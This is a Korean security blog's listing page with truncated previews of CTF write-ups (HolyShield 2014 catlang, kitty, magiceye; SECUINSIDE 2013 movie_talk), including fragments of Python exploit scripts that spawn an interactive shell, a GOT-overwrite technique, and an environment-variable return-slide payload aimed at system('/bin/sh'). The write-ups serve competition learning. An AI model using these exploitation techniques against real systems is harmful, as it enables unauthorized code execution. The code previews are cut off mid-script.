본문 바로가기
반응형

Security100

[exploit] 홀리쉴드 2014 catlang writeups 와...일단 풀이 올리기 전에 굉장한 기술문서를 작성한 pwn3r님 감사드리면서 기술문서도 함께 올리겠습니다... 기술문서 요약 : dynamic에 쓰기권한이 있을 때 strtab부분을 수정하여 원하는 함수를 호출할 수 있다. #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( "> " ) s.send( pay ) print 'sh #' t = telnetlib.Telnet() t.sock = s t.interact() 2014. 11. 28.
[misc] 홀리쉴드 2014 magiceye writeup ======================================================================= 문제파일을 HxD로 열어보면 zip파일 시그니처가 들어있습니다. zip파일을 추출하여 안의 파일을 보면 다음과 같습니다. 압축파일 내부의 파일 중에서 봐야할 이미지는 “fd1f96373b509c826add83a11020ea8d - copied.BMP”, “fd1f96373b509c826add83a11020ea8d.BMP"입니다. 이 두 이미지는 같은 이미지같지만 hash를 보면 다른 것을 알 수 있습니다. fd1 = open( "fd1f96373b509c826add83a11020ea8d - copied.BMP", "rb" ) fd2 = open( "fd1f96.. 2014. 11. 25.
[exploit] 홀리쉴드 2014 kitty writeups =========================== tag : got overwrite, _dl_runtime_resolve import socket import struct import telnetlib host = "192.168.1.22" port = 1120 s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) s.connect( ( host, port ) ) raw_input( ' go > ' ) def until_recv( st ): buf = '' while st not in buf: buf += s.recv( 1024 ) return buf #### teach #### print until_recv( "select") s.send( '2\n' ).. 2014. 11. 25.
[exploit] 2013 SECUINSIDE movie_talk writeups 해당 바이너리는 로컬환경으로 주어지는 exploit문제입니다. 당시 서버 환경은 ASLR과 NX가 정용되어있는 Ubuntu 13.04버전이었어요!! 로컬에서 ulimit -s unlimited를 입력해주면 라이브러리 주소가 고정되니 참고하시길 !!! ^---^ #!/bin/sh# for RET slide # [ret]*100 [system][system][/bin/sh][/bin/sh]for i in $(seq 1 512); do export a$i="`python -c "print '\x42\x6c\x0b\x40'*100 + '\x10\x8f\x07\x40\x10\x8f\x07\x40' + '\xf4\x74\x17\x40\xf4\x74\x17\x40'"`"; done #!/usr/bin/env pyth.. 2014. 11. 19.
728x90